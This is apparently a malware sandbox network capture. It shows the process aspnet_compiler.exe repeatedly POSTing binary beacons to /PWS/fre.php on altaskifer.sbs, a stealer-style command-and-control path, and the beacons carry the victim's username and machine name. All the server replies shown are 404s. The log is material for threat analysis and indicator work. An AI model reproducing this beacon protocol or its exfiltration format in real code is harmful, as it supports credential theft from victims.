Apr 6, 2024 09:29:24.963792086 CEST	188	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: 'ckav.ruengineer320946ENGINEER-PC+0FDD42EE188E931437F4FBE2C1UaSj
Apr 6, 2024 09:29:25.361860991 CEST	593	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bheu0mag0aVlTdqa%2B2whCGLclexLUE8fh7vPYv5c9hpJv30kJvKijhZXHSCSTW3%2Bc9XQ3otgdN8STBr1J5y1cduUCbrylZtVdD5BZup4S2EhuAEKtzOO0LpnJwkxUby9Iw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87001112aa860979-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49719	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:25.556360960 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:25.685328007 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:26.063576937 CEST	601	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tq5XK46q7SRjYFRcPZZfGKtcPIpBiLMJK4WjuAiH%2BL6Qev21ON07KL1P%2FnuNAOOFphYcTf%2FcinjsfdXVkPhgaPs2l03ihy5KeVBd2oVOyBooPop7xmnEGjFHscBB2WOilA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870011172fae7418-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49720	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:26.328738928 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:26.452619076 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:26.844019890 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XQlf5%2FacuzMTkhNJgzGLZhnCDuGZmEryVICVmz8xDF2ym%2BMi4i7DOkuSoaCgT74FoHB6xKgbwl8rtWhhz7ialFEoMikReHzqGOJ9%2BC8VZ5c0je%2Fuz1iaXknZeIzeSMrHEg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700111bf94031de-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49721	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:27.109786987 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:27.234020948 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:27.639862061 CEST	601	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ONA6rX4dIjq0FRHXmN2kZ2ccbZE0DrIAdlgCB4hb9%2BhB5awqiHVQdw0zJ9gYMvjjpyVI6dId2b2qCQUbpsYS0%2F%2FYCIGRzKVvpGciEWNfUjS76H1RteYAGfMg13Fg4FEjNg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87001120dc640a3a-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49722	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:27.906070948 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:28.029813051 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:28.413724899 CEST	607	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9i5I%2BracQCcxDtbpzUbdOiX6%2FwkWRPKLgdxykSAcPP5CjaxHsaHVZa1YDUJdptqhRfzPfxD%2FaFi0C%2BHMPSfZZ9JzwAhWYF5c8%2BpL4YG4aOVdNDz7lHnufK8iWqkzyj16%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87001125c8cb9acc-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49723	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:28.699734926 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:28.823987007 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:29.197910070 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oUmyiwEd2zpFZsUAyI2ESZOLJ3RoFI7xRP1ztasVJ5FQvs81KArTtNXS6KS2kmknhMM%2B%2FV8n0kB5ECzTTsMO%2B52kW2Eg2Bts85aNV8XIq2p8Hvwfs1kLIeu%2BCoD1wV4lyQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700112acc7d746d-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49724	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:29.470676899 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:29.594660997 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:29.977092981 CEST	601	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zfO5XLLVxWaNiZKsnR3N%2Bzt1JjZxCOKWjjtU00rPBkBavNUBwoMEFYq5md3Y%2FvsYKJgxzqV6u41vqHNPK1NmzL5KJoI9FP%2FlMNbgYk7sZz9olEJB0kpeRdnKBLJDJEQreg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700112f9d543716-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49725	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:30.251229048 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:30.375672102 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:30.771745920 CEST	605	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AMZnBkdceyFE2b24b%2BfYVFN6ykyVZABVUSCTOE5OIzeiw%2FNdCqW63u01LzCdepKlTKvXU9cfx%2B5f8ttgfMJfgJQz30osK1oYB8ONphvfv%2F4kakHTSmGASlFA2%2BkOldEypg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870011347f8e336a-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49727	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:31.298966885 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:31.430867910 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:31.809593916 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8Ao6YPXXkWHvRESy3tdUirn6gNtrA5tNz359v%2FbNuuJIqYSZNZBCRfEqElWXbxfy5EIdXxKd9qdvm2pyJM3OWFQ%2BE%2BcBB66MOQI3zQFRJQCy5v3iYgmyilEc5%2B5b6bMWqQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700113b0e78a560-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49728	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:33.293190956 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:33.417077065 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:33.795572042 CEST	605	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:33 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9vj57YDwUvjiFWtx7WNXCXL6I2aHdsAEO%2FUtJ0efrycQINbWbAOAVxIbRPWjkUiBFM4kHzP0J%2FRxvu4zA8I%2B49Hi5O6aDGx3JQ9WWvlg8OGsPDx%2BKjXGIizHKzvQLx1%2BIw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870011477836dad5-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49729	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:34.079276085 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:34.203481913 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:34.587708950 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KpcO4e2MmBG8j6ozX8bgTowbyzV5rECbGdYseCZ6Zkq%2BF77mx9p%2B1VWaSNglSIxEe7ThtaBYDTnYt%2BDZoUbO0Hd1GnVJl9EjR4S6%2B00CE9pb1DTZyeD00OUfac5tYzVmpg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700114c686b9acb-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49731	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:34.860100031 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:34.984730005 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:35.355005980 CEST	605	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CZAAR69kvm8pG%2BzEIMCKOWZWQtij1b1yDdUxNreY8JpoB5zd0hv08VnYUMWkxYGqGYvhOjN6GdyQcicEN2o5S3Rf6%2FVERPIR0iiGXUpYMWNA%2BXTiwvx4f%2FVUT8mjC%2Fh4NQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870011514e04a4f4-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49734	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:35.705322027 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:35.829746962 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:36.210764885 CEST	601	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tx6YIKEpJ2IyF45rEKr%2BVGrtTVGOXmSpMrhrPhzQKwOUkQfIoTREnWAvJssubCQw9AwhJtlt2xNO6mTQRn%2Fl%2BV1J94m0ZZhWX0cgML1ZS1SBKRnWtxMAWcSTBEuI2xCBgQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870011568bc831e6-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49737	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:36.488684893 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:36.614898920 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:36.985990047 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HCAAOS1pSnGhzyPQRn5rHK9nAzs9RSoknv67Z4pmfqeXP11pEi31W0UsP%2BtA6QOIffEWbhNl3HgXQmdeSnvzTeN%2F5ln%2BWkCrnQDzXghK%2FW3FjZqruM2rnsHpMe1OSJkivg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700115b7d46a569-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49739	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:37.260471106 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:37.384936094 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:37.756086111 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LXhtAyGeRIx8GsNU2BQ6IwXoQi7BerEUnab%2BGEd6cNL4sDv%2B02StVEc12eA2Prp%2BEUb7P6aIgUMxZUKRUJTQceN0JC0Yy%2FKuItRKaH6YGfXtMFTufL9eac5VXAoEHoVEJg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700116048bb31fb-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49740	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:38.036926985 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
